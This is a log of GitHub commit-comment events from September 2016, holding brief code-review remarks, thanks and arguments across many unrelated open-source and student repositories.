{"id":"4546579603","type":"CommitCommentEvent","actor":{"login":"TomMalbran"},"repo":{"name":"TeamPorcupine/ProjectPorcupine"},"payload":{"comment":{"id":18978350,"position":119,"line":119,"path":"Assets/Scripts/UI/InGameUI/MenuLeft/ConstructionMenu.cs","commit_id":"b86f466931cc677f75dae8330e2670c2fe013ad6","created_at":"2016-09-11T21:45:13Z","updated_at":"2016-09-11T21:45:13Z","body":"That is from master: https://github.com/TeamPorcupine/ProjectPorcupine/blob/master/Assets/Scripts/UI/InGameUI/MenuLeft/ConstructionMenu.cs#L119\r\n\r\nYou might get even an error in master. And should be fixed there."}},"created_at":"2016-09-11T21:45:13Z"}
{"id":"4546581509","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18978352,"position":24,"line":64,"path":"src/main/java/com/softserverinc/edu/services/UserService.java","commit_id":"07a3ea0870f792da424b3310111c5f0b76f52ea8","created_at":"2016-09-11T21:46:28Z","updated_at":"2016-09-11T21:46:28Z","body":":+1: for first java 8 source code (or I missed first)"}},"created_at":"2016-09-11T21:46:28Z"}
{"id":"4546581833","type":"CommitCommentEvent","actor":{"login":"ViralBShah"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18978353,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T21:46:44Z","updated_at":"2016-09-11T21:46:44Z","body":"I think the build is already complex enough, and perhaps best not to encourage too many deviations as it will only lead to more issues being reported."}},"created_at":"2016-09-11T21:46:44Z"}
{"id":"4546582721","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":18978354,"position":40,"line":132,"path":"src/main/java/com/softserverinc/edu/services/UserService.java","commit_id":"07a3ea0870f792da424b3310111c5f0b76f52ea8","created_at":"2016-09-11T21:47:18Z","updated_at":"2016-09-11T21:47:18Z","body":"if you call such method for repository - it's ok, but here in Service need to have some human readeable better name"}},"created_at":"2016-09-11T21:47:18Z"}
{"id":"4546583759","type":"CommitCommentEvent","actor":{"login":"uscitp-noahbake"},"repo":{"name":"uscitp-noahbake/itp125"},"payload":{"comment":{"id":18978356,"position":null,"line":null,"path":null,"commit_id":"24fa7eb8f33c4f55595647f93d25cc909fe4aa67","created_at":"2016-09-11T21:47:59Z","updated_at":"2016-09-11T21:47:59Z","body":"gave it my own password instead of the one requested in the assignment.  Password: 'hw01'"}},"created_at":"2016-09-11T21:47:59Z"}
{"id":"4546584387","type":"CommitCommentEvent","actor":{"login":"wwyc"},"repo":{"name":"wwyc/Projects"},"payload":{"comment":{"id":18978357,"position":null,"line":null,"path":null,"commit_id":"5217fab0f422d2b8f05fb04ac140771c2abad80f","created_at":"2016-09-11T21:48:28Z","updated_at":"2016-09-11T21:48:28Z","body":"Program that calculates the cost of a pizza with chosen toppings"}},"created_at":"2016-09-11T21:48:28Z"}
{"id":"4546585838","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18978359,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-11T21:49:32Z","updated_at":"2016-09-11T21:49:32Z","body":"Great to hear that. I personally don't use the stable PPA not that often,\nso if the master PPA is working I'm just guessing the stable PPA is fine,\ntoo.\n\nMit freundlichen Grüßen/With kind regards\n- Thomas Karl Pietrowski\n"}},"created_at":"2016-09-11T21:49:32Z"}
{"id":"4546588313","type":"CommitCommentEvent","actor":{"login":"cooper-anderson"},"repo":{"name":"cooper-anderson/Blockade"},"payload":{"comment":{"id":18978362,"position":null,"line":null,"path":null,"commit_id":"23bbc0ccfe84a425c2499d827bfb790bd87967d0","created_at":"2016-09-11T21:51:11Z","updated_at":"2016-09-11T21:51:11Z","body":"Error! correct version number is `v0.2.20`"}},"created_at":"2016-09-11T21:51:11Z"}
{"id":"4546589248","type":"CommitCommentEvent","actor":{"login":"rubengees"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":18978363,"position":null,"line":null,"path":null,"commit_id":"a1f779153eb44cce837495a25ddffeead7ca18dd","created_at":"2016-09-11T21:51:49Z","updated_at":"2016-09-11T21:51:49Z","body":":tada: "}},"created_at":"2016-09-11T21:51:49Z"}
{"id":"4546589490","type":"CommitCommentEvent","actor":{"login":"maiconx"},"repo":{"name":"maiconx/ubunturp"},"payload":{"comment":{"id":18978364,"position":4,"line":6,"path":"src/index.html","commit_id":"9a17c100961bb3d72aced79e88bf41f849c09a8a","created_at":"2016-09-11T21:52:00Z","updated_at":"2016-09-11T21:52:00Z","body":"Add css file"}},"created_at":"2016-09-11T21:52:00Z"}
{"id":"4546591315","type":"CommitCommentEvent","actor":{"login":"GurvirJohal"},"repo":{"name":"GurvirJohal/JabbaHutt"},"payload":{"comment":{"id":18978366,"position":null,"line":null,"path":null,"commit_id":"141605243b970b9a9cf5ce156b95128cc5297075","created_at":"2016-09-11T21:53:12Z","updated_at":"2016-09-11T21:53:12Z","body":"testing git"}},"created_at":"2016-09-11T21:53:12Z"}
{"id":"4546591822","type":"CommitCommentEvent","actor":{"login":"akmyrat"},"repo":{"name":"akmyrat/Builds"},"payload":{"comment":{"id":18978370,"position":null,"line":null,"path":null,"commit_id":"bacb15c9623f3d082d8c9143f5f8b70cd8d665d8","created_at":"2016-09-11T21:53:34Z","updated_at":"2016-09-11T21:53:34Z","body":"Yeah, I totally agree with you!"}},"created_at":"2016-09-11T21:53:34Z"}
{"id":"4546592497","type":"CommitCommentEvent","actor":{"login":"GurvirJohal"},"repo":{"name":"GurvirJohal/JabbaHutt"},"payload":{"comment":{"id":18978372,"position":null,"line":null,"path":null,"commit_id":"a9d199e730c738728737c240e76e0113233ff14c","created_at":"2016-09-11T21:54:02Z","updated_at":"2016-09-11T21:54:02Z","body":"updated homepage"}},"created_at":"2016-09-11T21:54:02Z"}
{"id":"4546594082","type":"CommitCommentEvent","actor":{"login":"clee158"},"repo":{"name":"dnagarkar/DatabaseProject"},"payload":{"comment":{"id":18978375,"position":null,"line":null,"path":null,"commit_id":"1c46b9d975c4792db8f6ec17786027bbdb4915a5","created_at":"2016-09-11T21:55:08Z","updated_at":"2016-09-11T21:55:08Z","body":"yay!!!!"}},"created_at":"2016-09-11T21:55:08Z"}
{"id":"4546595284","type":"CommitCommentEvent","actor":{"login":"GurvirJohal"},"repo":{"name":"GurvirJohal/JabbaHutt"},"payload":{"comment":{"id":18978378,"position":null,"line":null,"path":null,"commit_id":"7d453a03b4afb92b8a2c7738b6a3b2896ace7e5c","created_at":"2016-09-11T21:55:56Z","updated_at":"2016-09-11T21:55:56Z","body":"inserted student class"}},"created_at":"2016-09-11T21:55:56Z"}
{"id":"4546597860","type":"CommitCommentEvent","actor":{"login":"bensu1013"},"repo":{"name":"bensu1013/Calc-Trial"},"payload":{"comment":{"id":18978380,"position":null,"line":null,"path":null,"commit_id":"2eb32ccbfebf83cf8e81f108a6b9236c2304d2f9","created_at":"2016-09-11T21:57:38Z","updated_at":"2016-09-11T21:57:38Z","body":"hm, how do i update this stuff!! gah"}},"created_at":"2016-09-11T21:57:38Z"}
{"id":"4546598081","type":"CommitCommentEvent","actor":{"login":"jasssonpet"},"repo":{"name":"NativeScript/ios-runtime"},"payload":{"comment":{"id":18978381,"position":42,"line":39,"path":"src/NativeScript/Workers/WorkerThread.mm","commit_id":"10fca84d7db298422faf75c466d88ba2f551074c","created_at":"2016-09-11T21:57:45Z","updated_at":"2016-09-11T21:57:45Z","body":"Since the runloop is stopped, no tasks will be executed, but we can remove it before deallocation to balance the scheduling after allocation for consistency."}},"created_at":"2016-09-11T21:57:45Z"}
{"id":"4546599700","type":"CommitCommentEvent","actor":{"login":"warp-core"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18978383,"position":null,"line":null,"path":null,"commit_id":"d1cb5280cd70237e11e6d837551937bd0ce2dd96","created_at":"2016-09-11T21:58:59Z","updated_at":"2016-09-11T21:58:59Z","body":"What about the heat sink?"}},"created_at":"2016-09-11T21:58:59Z"}
{"id":"4546603086","type":"CommitCommentEvent","actor":{"login":"jasssonpet"},"repo":{"name":"NativeScript/ios-runtime"},"payload":{"comment":{"id":18978387,"position":46,"line":75,"path":"src/NativeScript/JSErrors.mm","commit_id":"b5d3de4db87af892972f8797481ec780dcff68a6","created_at":"2016-09-11T22:00:56Z","updated_at":"2016-09-11T22:00:56Z","body":"I would suggest using some form of virtual dispatch here, maybe extracting this as a method in the `TNSWorkerRuntime`."}},"created_at":"2016-09-11T22:00:56Z"}
{"id":"4546605133","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"commercialhaskell/stack"},"payload":{"comment":{"id":18978389,"position":43,"line":204,"path":"src/System/Process/Read.hs","commit_id":"e3aa2388cefc083605091c55e92d9af09e048182","created_at":"2016-09-11T22:02:16Z","updated_at":"2016-09-11T22:02:16Z","body":"Applicative is not in scope pre-7.10 😢 . Testing fix in cc41686ede514afc9de230a96063e23c73b49eb5."}},"created_at":"2016-09-11T22:02:16Z"}
{"id":"4546605503","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18978390,"position":null,"line":null,"path":null,"commit_id":"67c90daa4cc7e3f1ca47caf34f67d20cd6c99326","created_at":"2016-09-11T22:02:34Z","updated_at":"2016-09-11T22:02:34Z","body":"Neat, finally got rid of that complicated piece of code!"}},"created_at":"2016-09-11T22:02:34Z"}
{"id":"4546617030","type":"CommitCommentEvent","actor":{"login":"Alinaznawaz"},"repo":{"name":"Alinaznawaz/NodeApis"},"payload":{"comment":{"id":18978399,"position":null,"line":null,"path":null,"commit_id":"3cd60dd52cbec9b342de776d5ed2594e4337ebc0","created_at":"2016-09-11T22:10:19Z","updated_at":"2016-09-11T22:10:19Z","body":"Node.js Apis "}},"created_at":"2016-09-11T22:10:19Z"}
{"id":"4546618674","type":"CommitCommentEvent","actor":{"login":"JPeroutek"},"repo":{"name":"pringers/usd.pw"},"payload":{"comment":{"id":18978400,"position":null,"line":null,"path":null,"commit_id":"f9d390d1fd4a46a178a11ddd3eb257ad65df1d79","created_at":"2016-09-11T22:11:24Z","updated_at":"2016-09-11T22:11:24Z","body":"Someone please test this.\r\nI dont have windows ATM"}},"created_at":"2016-09-11T22:11:24Z"}
{"id":"4546619582","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18978401,"position":null,"line":null,"path":null,"commit_id":"4fb5f3ee55bc257d8344f0465bc5ca6488e6b9cf","created_at":"2016-09-11T22:12:03Z","updated_at":"2016-09-11T22:12:03Z","body":"1,559 additions, 1,553 deletions?\r\nWhat happened?"}},"created_at":"2016-09-11T22:12:03Z"}
{"id":"4546621472","type":"CommitCommentEvent","actor":{"login":"IvanTheCracka"},"repo":{"name":"HippieStationCode/HippieStation13"},"payload":{"comment":{"id":18978402,"position":null,"line":null,"path":null,"commit_id":"07284e1870381a747a3ab629abfa97aa1e87ca83","created_at":"2016-09-11T22:13:19Z","updated_at":"2016-09-11T22:13:19Z","body":"yeah all will be goofed up when rebasing and everything will be bugged"}},"created_at":"2016-09-11T22:13:19Z"}
{"id":"4546622550","type":"CommitCommentEvent","actor":{"login":"deusvalen"},"repo":{"name":"deusvalen/Class-1"},"payload":{"comment":{"id":18978403,"position":null,"line":null,"path":null,"commit_id":"0fefbfb98a1152d0a53c526a56128c7ed9db1aa5","created_at":"2016-09-11T22:14:00Z","updated_at":"2016-09-11T22:14:00Z","body":"пиздюк"}},"created_at":"2016-09-11T22:14:00Z"}
{"id":"4546622841","type":"CommitCommentEvent","actor":{"login":"alexeykudinkin"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18978404,"position":null,"line":null,"path":null,"commit_id":"e8f41e0565f610b1b30dd4aab8f13230a373f1e1","created_at":"2016-09-11T22:14:12Z","updated_at":"2016-09-11T22:14:12Z","body":"Looks like, we're absolutely in need for test here."}},"created_at":"2016-09-11T22:14:12Z"}
{"id":"4546625881","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18978408,"position":null,"line":null,"path":null,"commit_id":"67c90daa4cc7e3f1ca47caf34f67d20cd6c99326","created_at":"2016-09-11T22:16:17Z","updated_at":"2016-09-11T22:16:17Z","body":"I was lazy and didn't run the benchmarks on a branch, so it's still not totally passed."}},"created_at":"2016-09-11T22:16:17Z"}
{"id":"4546625883","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18978409,"position":8,"line":8,"path":"src/head_server/schedulers/base scheduler","commit_id":"bc02bfb54abc0486585ee5c16e5f5811ec9b6848","created_at":"2016-09-11T22:16:17Z","updated_at":"2016-09-11T22:16:17Z","body":"Should be `BaseSchedulerType` or something similar"}},"created_at":"2016-09-11T22:16:17Z"}
{"id":"4546627018","type":"CommitCommentEvent","actor":{"login":"Kierany9"},"repo":{"name":"HippieStationCode/HippieStation13"},"payload":{"comment":{"id":18978411,"position":null,"line":null,"path":null,"commit_id":"07284e1870381a747a3ab629abfa97aa1e87ca83","created_at":"2016-09-11T22:17:07Z","updated_at":"2016-09-11T22:17:07Z","body":"Were you born this jaded or did it come over time?"}},"created_at":"2016-09-11T22:17:07Z"}
{"id":"4546627620","type":"CommitCommentEvent","actor":{"login":"jnovack"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18978412,"position":null,"line":null,"path":null,"commit_id":"5a24cc78e806171c88e55a8ce0fb8b9589431c3d","created_at":"2016-09-11T22:17:29Z","updated_at":"2016-09-11T22:17:29Z","body":"Heh"}},"created_at":"2016-09-11T22:17:29Z"}
{"id":"4546627968","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18978413,"position":31,"line":31,"path":"src/head_server/schedulers/base scheduler","commit_id":"bc02bfb54abc0486585ee5c16e5f5811ec9b6848","created_at":"2016-09-11T22:17:46Z","updated_at":"2016-09-11T22:17:46Z","body":"This should be something like `RandomSchedulerType`"}},"created_at":"2016-09-11T22:17:46Z"}
{"id":"4546628187","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18978414,"position":null,"line":null,"path":null,"commit_id":"c23f9b34318fca9c05115730b49b1818d21fedbf","created_at":"2016-09-11T22:17:55Z","updated_at":"2016-09-11T22:17:55Z","body":"@rickyc gahh ive tried everything but ive been stuck bcuz i cant figure out why line 90 isn't working. I even tried using confidence."}},"created_at":"2016-09-11T22:17:55Z"}
{"id":"4546628564","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18978415,"position":4,"line":4,"path":"src/head_server/schedulers/main.js","commit_id":"bc02bfb54abc0486585ee5c16e5f5811ec9b6848","created_at":"2016-09-11T22:18:11Z","updated_at":"2016-09-11T22:18:11Z","body":"Dont need express yet"}},"created_at":"2016-09-11T22:18:11Z"}
{"id":"4546629709","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18978416,"position":1,"line":1,"path":"src/head_server/status/status.html","commit_id":"bc02bfb54abc0486585ee5c16e5f5811ec9b6848","created_at":"2016-09-11T22:19:00Z","updated_at":"2016-09-11T22:19:00Z","body":"This is **wrong**. Simply not HTML syntax"}},"created_at":"2016-09-11T22:19:00Z"}
{"id":"4546631261","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18978418,"position":15,"line":15,"path":"src/head_server/status/status.html","commit_id":"bc02bfb54abc0486585ee5c16e5f5811ec9b6848","created_at":"2016-09-11T22:20:04Z","updated_at":"2016-09-11T22:20:04Z","body":"This might be the Inject button for the scheduler.\r\nShould have 2 number boxes that specify which clients to schedule"}},"created_at":"2016-09-11T22:20:04Z"}
{"id":"4546635603","type":"CommitCommentEvent","actor":{"login":"maximerischard"},"repo":{"name":"JuliaLang/Compat.jl"},"payload":{"comment":{"id":18978422,"position":null,"line":null,"path":null,"commit_id":"f373714dbc1085943b6dac9f378521b21a9bc2d7","created_at":"2016-09-11T22:22:59Z","updated_at":"2016-09-11T22:22:59Z","body":"Just what I needed! Could a version tag be created for this commit please?"}},"created_at":"2016-09-11T22:22:59Z"}
{"id":"4546635799","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18978423,"position":null,"line":null,"path":null,"commit_id":"4fb5f3ee55bc257d8344f0465bc5ca6488e6b9cf","created_at":"2016-09-11T22:23:07Z","updated_at":"2016-09-11T22:23:07Z","body":"I don't know, maybe I've been extremely productive? :D :D"}},"created_at":"2016-09-11T22:23:07Z"}
{"id":"4546636824","type":"CommitCommentEvent","actor":{"login":"mhsjlw"},"repo":{"name":"construct/construct"},"payload":{"comment":{"id":18978424,"position":null,"line":null,"path":null,"commit_id":"55065489fe945b16f507227b77a567f51e6232c1","created_at":"2016-09-11T22:23:49Z","updated_at":"2016-09-11T22:23:49Z","body":"Perhaps an IRC chat would be helpful as well?"}},"created_at":"2016-09-11T22:23:49Z"}
{"id":"4546638667","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18978427,"position":null,"line":null,"path":null,"commit_id":"c23f9b34318fca9c05115730b49b1818d21fedbf","created_at":"2016-09-11T22:25:10Z","updated_at":"2016-09-11T22:25:10Z","body":"The first thing is to indent your code properly so it makes it easier on\nmy 👀. The good thing is Atom has an auto indent button!\n\nhttp://stackoverflow.com/questions/22611377/auto-indent-code-in-atom-editor\n\nSometimes when you're stuck, it's good to walk away and come back to the\ncode later. You might realize something you haven't thought of. You're\nactually very close. I see why Line 90 won't work. For now, I want you to\ntake a break. I'll post an explanation why it won't work later.\n\nI would rather you try and get the PR working since it'll help me comment\nyour code better.\n\nMy suggestion is to make a copy of the files and put it somewhere outside\nthe git repository (folder). Delete the files and commit it to master. Now\nmake a new branch called homework-1 and paste the files back in and commit\nit to homework-1. Then make a pull request.\n\nOn Sun, Sep 11, 2016 at 6:17 PM erinl1 <notifications@github.com> wrote:\n\n> @rickyc <https://github.com/rickyc> gahh ive tried everything but ive\n> been stuck bcuz i cant figure out why line 90 isn't working. I even tried\n> using confidence.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/c23f9b34318fca9c05115730b49b1818d21fedbf#commitcomment-18978414>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAG0kdd4jzxd2zX_f1jGtn4zUinBtq-Iks5qpH4TgaJpZM4J6Htp>\n> .\n>\n"}},"created_at":"2016-09-11T22:25:10Z"}
{"id":"4546640889","type":"CommitCommentEvent","actor":{"login":"yaalsn"},"repo":{"name":"drcoms/jlu-drcom-client"},"payload":{"comment":{"id":18978429,"position":null,"line":null,"path":null,"commit_id":"3a3c5c263efb0901b30322ec95ca15cfbf0c813c","created_at":"2016-09-11T22:26:40Z","updated_at":"2016-09-11T22:26:40Z","body":"@dzxx36gyy 自动配置器得到的mac是错误的。麻烦你手动填写下CONFIG之间的内容(尤其是mac一定要和网络中心注册的一样)再试一下，并给个结果反馈。(还不好使的话，看看老黄历？)"}},"created_at":"2016-09-11T22:26:40Z"}
{"id":"4546641965","type":"CommitCommentEvent","actor":{"login":"imsauravsingh"},"repo":{"name":"imsauravsingh/homeo"},"payload":{"comment":{"id":18978434,"position":null,"line":null,"path":null,"commit_id":"16970cc291ce9f5795620eec3539827d244bce07","created_at":"2016-09-11T22:27:25Z","updated_at":"2016-09-11T22:27:25Z","body":"hi now i am merging updated work."}},"created_at":"2016-09-11T22:27:25Z"}
{"id":"4546642645","type":"CommitCommentEvent","actor":{"login":"HNKNTOC"},"repo":{"name":"HNKNTOC/NavigationDrawerV2"},"payload":{"comment":{"id":18978438,"position":24,"line":63,"path":"app/src/main/res/layout/custom_card_viwe.xml","commit_id":"ae3032d754d1fc4309236777e211d2f18a856f6b","created_at":"2016-09-11T22:27:55Z","updated_at":"2016-09-11T22:27:55Z","body":"Delet this string."}},"created_at":"2016-09-11T22:27:55Z"}
{"id":"4546643272","type":"CommitCommentEvent","actor":{"login":"arekbulski"},"repo":{"name":"construct/construct"},"payload":{"comment":{"id":18978439,"position":null,"line":null,"path":null,"commit_id":"55065489fe945b16f507227b77a567f51e6232c1","created_at":"2016-09-11T22:28:23Z","updated_at":"2016-09-11T22:28:23Z","body":"I would not be sticking on it all day long, so probably not. But thanks for the suggestion.\r\n\r\nYou should post this as an issue. Commit comments are for code review."}},"created_at":"2016-09-11T22:28:23Z"}
{"id":"4546649517","type":"CommitCommentEvent","actor":{"login":"ezyang"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18978445,"position":21,"line":223,"path":"cabal-install/tests/UnitTests/Distribution/Solver/Modular/QuickCheck.hs","commit_id":"c36d11ff2e94458a51ae69368c84f1549ddba09c","created_at":"2016-09-11T22:33:02Z","updated_at":"2016-09-11T22:33:02Z","body":"Oh you are right. I guess that also means that a ComponentLib can end up with more than 5 dependencies? Seems harmless but awfully indirect ;)"}},"created_at":"2016-09-11T22:33:02Z"}
{"id":"4546649613","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18978446,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T22:33:08Z","updated_at":"2016-09-11T22:33:08Z","body":"You are right. Breaking it down is slower because we are basically accessing `x` in a back and forth order.\r\nI could figure out an easy way to avoid matrix copying. We can leave for later discussion.\r\nI just implemented `rep_len` function. If adding a line `res = rep_len(x, nrow*ncol)` in the function, it will deal with shorter `x`.\r\n\r\n\r\n"}},"created_at":"2016-09-11T22:33:08Z"}
{"id":"4546652614","type":"CommitCommentEvent","actor":{"login":"NL-BlackDragon"},"repo":{"name":"CyanideL/android_frameworks_base"},"payload":{"comment":{"id":18978447,"position":null,"line":null,"path":null,"commit_id":"24ac51867b6b37546b35710f2146b44883acf60b","created_at":"2016-09-11T22:35:26Z","updated_at":"2016-09-11T22:35:26Z","body":"Your funny dude, i will respond like a man. As you admit kanging my work, but also you kang work done by other devs. (i know that and many others devs!) so what does that mean, You are still a Kanger and learned nothing!! You still you believe your somekind of uber dev with your own builded app lol (all old shit man, old code for navdrawer etc. code that was used back in gingerbread days lol)\r\n\r\nExpansionView is a ugly fucked up feature full of bad coding by you and giving lots of glitches and issues. Thats why no dev picked it up to use in there rom. Also alot of ExpansionView code comes from XxMrHyde his previous codes in LP (then you know what i mean) and you needed help from XXMrHyde to get the expansionview to work. Nice work done mate, be proud!!\r\n\r\nBut you know dude i have more important things todo in life then this bullshit. \r\nIm not going to whine about all the stuff you kanged or will kang from me or others in the future. \r\ni know what i did, and you know what you didnt do as you didnt know howto. sad!!\r\n\r\nI learned from my mistakes and moved on. Started learning alot more about real developing, \r\nand now i got a great new job as app developer for a big company.\r\nAnd you know @work its not possible to kang someone else their code, you have todo it all by yourself.\r\nO and the good part is i earn money doing that!\r\n\r\nBut enough said, i will now crawl back in to my wonderful hole that is called a life.\r\n\r\nHappy kanging dude!!"}},"created_at":"2016-09-11T22:35:26Z"}
{"id":"4546653827","type":"CommitCommentEvent","actor":{"login":"Kavex"},"repo":{"name":"ellisonleao/magictools"},"payload":{"comment":{"id":18978450,"position":null,"line":null,"path":null,"commit_id":"d980a5eaea4df839026f360cf96974e982abca05","created_at":"2016-09-11T22:36:18Z","updated_at":"2016-09-11T22:36:18Z","body":"Oops spaces lol "}},"created_at":"2016-09-11T22:36:18Z"}
{"id":"4546656851","type":"CommitCommentEvent","actor":{"login":"Meatballs1"},"repo":{"name":"adaptivethreat/BloodHound"},"payload":{"comment":{"id":18978452,"position":null,"line":null,"path":null,"commit_id":"8c448a4aa6dfa819efbef1cbfc3b029ae68add5c","created_at":"2016-09-11T22:38:38Z","updated_at":"2016-09-11T22:38:38Z","body":"Cool  :D \r\n\r\nI assume it captures members who are in groups > 1500 members as it is a calculated attribute?\r\n\r\nDoes it capture foreign domain users? You have code in there to handle it but not sure if just ported over. I assume all foreign users via external trusts are stored as a local Foreign Security Principal (do they have a memberof attribute?), but not sure about domains within the same forest? "}},"created_at":"2016-09-11T22:38:38Z"}
{"id":"4546660492","type":"CommitCommentEvent","actor":{"login":"neetVeritas"},"repo":{"name":"neetVeritas/pye-module"},"payload":{"comment":{"id":18978456,"position":null,"line":null,"path":null,"commit_id":"0d64c4778e89a6519d6afd172827fa6c607e9ddf","created_at":"2016-09-11T22:41:20Z","updated_at":"2016-09-11T22:41:20Z","body":"@Crunchyroll1,\r\n\r\nRegarding class stacking, it's honestly been so long that I don't remember.\r\n\r\nAs for the C++ related questions, they have been answered multiple times in this post. Please read before asking further questions.\r\n\r\n```c++\r\nunsigned int addy = 0x0; // # some address to read from\r\nint val = 0;\r\n\r\nval = * (INT * )( * (DWORD * ) addy ); // # get value from addy\r\n* (INT * )( * (DWORD * ) addy ) = val; // # set value to addy\r\n```"}},"created_at":"2016-09-11T22:41:20Z"}
{"id":"4546661681","type":"CommitCommentEvent","actor":{"login":"leonardosnt"},"repo":{"name":"RocketMod/Rocket"},"payload":{"comment":{"id":18978457,"position":null,"line":null,"path":null,"commit_id":"069fc895b8874e9024c9f67d2a54bd121f123fde","created_at":"2016-09-11T22:42:15Z","updated_at":"2016-09-11T22:42:15Z","body":"O.o"}},"created_at":"2016-09-11T22:42:15Z"}
{"id":"4546661904","type":"CommitCommentEvent","actor":{"login":"xfq"},"repo":{"name":"VSCodeVim/Vim"},"payload":{"comment":{"id":18978458,"position":null,"line":null,"path":null,"commit_id":"cbe37e727e9f6cd927c074cda465bb2b25465e28","created_at":"2016-09-11T22:42:27Z","updated_at":"2016-09-11T22:42:27Z","body":"@xconverge I see. Thanks for the pointer. I didn't see the PR."}},"created_at":"2016-09-11T22:42:27Z"}
{"id":"4546663165","type":"CommitCommentEvent","actor":{"login":"ar"},"repo":{"name":"jpos/jPOS"},"payload":{"comment":{"id":18978461,"position":null,"line":null,"path":null,"commit_id":"8a12c1870b469d3d12c281d3f0105c33bfec6185","created_at":"2016-09-11T22:43:20Z","updated_at":"2016-09-11T22:43:20Z","body":"As @vsalaman said, legacy reasons, but a PR is Welcome to get that code better (provided is not slower than what we have now, which is pretty fast). Endpoints using EBCDIC happen to be high load legacy institutions and I wouldn't like to slow the code down.\r\n"}},"created_at":"2016-09-11T22:43:20Z"}
{"id":"4546663357","type":"CommitCommentEvent","actor":{"login":"apevec"},"repo":{"name":"rdo-common/python-voluptuous"},"payload":{"comment":{"id":18978462,"position":null,"line":null,"path":null,"commit_id":"100479569ae9603acd01c97095f56aee8d07cc71","created_at":"2016-09-11T22:43:29Z","updated_at":"2016-09-11T22:43:29Z","body":"@hguemar Fedora Rawhide has 0.8.11 [1] why not take that?\r\n\r\n[1] http://pkgs.fedoraproject.org/cgit/rpms/python-voluptuous.git/commit/?id=7dafee20514ea67f7858400b55c964c3e77b3ca7"}},"created_at":"2016-09-11T22:43:29Z"}
{"id":"4546667255","type":"CommitCommentEvent","actor":{"login":"jbleyel"},"repo":{"name":"E2OpenPlugins/e2openplugin-OpenWebif"},"payload":{"comment":{"id":18978467,"position":null,"line":null,"path":null,"commit_id":"c63ebb9d533316eca546d134b6d4e49dca332231","created_at":"2016-09-11T22:46:23Z","updated_at":"2016-09-11T22:46:23Z","body":"Was ist denn hier passiert?"}},"created_at":"2016-09-11T22:46:23Z"}
{"id":"4546669439","type":"CommitCommentEvent","actor":{"login":"ceylina"},"repo":{"name":"Auctionator/Auctionator"},"payload":{"comment":{"id":18978469,"position":null,"line":null,"path":null,"commit_id":"91a004cc4c94c5900e522f5c4b1f1da266169754","created_at":"2016-09-11T22:48:00Z","updated_at":"2016-09-11T22:48:00Z","body":"Also, with the dramatic changes to the AH code we need to push fixes and try and encourage people to use the latest version. This will remain for the time being as it is a useful nag tool to ensure people do try and stay current.\r\n\r\nIf you want this to go away, have a nice long chat with the Wow devs and tell them to make AH addons irrelevant by updating the way the AH works ;)"}},"created_at":"2016-09-11T22:48:00Z"}
{"id":"4546669755","type":"CommitCommentEvent","actor":{"login":"alexeykudinkin"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18978470,"position":14,"line":44,"path":"src/test/kotlin/org/rust/lang/core/stubs/RustStubAccessTest.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-11T22:48:13Z","updated_at":"2016-09-11T22:48:13Z","body":"What does this test actually tests?"}},"created_at":"2016-09-11T22:48:13Z"}
{"id":"4546670310","type":"CommitCommentEvent","actor":{"login":"alexeykudinkin"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18978471,"position":14,"line":44,"path":"src/test/kotlin/org/rust/lang/core/stubs/RustStubAccessTest.kt","commit_id":"8f02d6b5ab4756941cfcc636160dd540975eb54e","created_at":"2016-09-11T22:48:38Z","updated_at":"2016-09-11T22:48:38Z","body":"P.S. I see what it tests, i don't see justification for this."}},"created_at":"2016-09-11T22:48:38Z"}
